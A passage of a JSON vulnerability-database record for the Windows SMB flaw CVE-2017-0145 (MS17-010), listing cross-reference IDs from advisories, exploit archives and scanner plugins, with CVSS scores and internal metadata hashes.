"MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-12-14T17:47:19", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2018-12-14T17:47:19", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "a0c241a267e58716578a1cf1db23a7bf"}, {"key": "href", "hash": "fab8a7a7f05c11614ecd38f9c0b5d170"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "dce6d600243a8c5294b0bb826c34eb2f"}, {"key": "published", "hash": "dce6d600243a8c5294b0bb826c34eb2f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f665a0244ee0bec3b35a68308d6d1c9d"}, {"key": "title", "hash": "d9861566a7a3d91d8b7889de8f756560"}, {"key": "type", "hash": "618600407f489983189d0d992f1272e6"}], "scheme": null}]}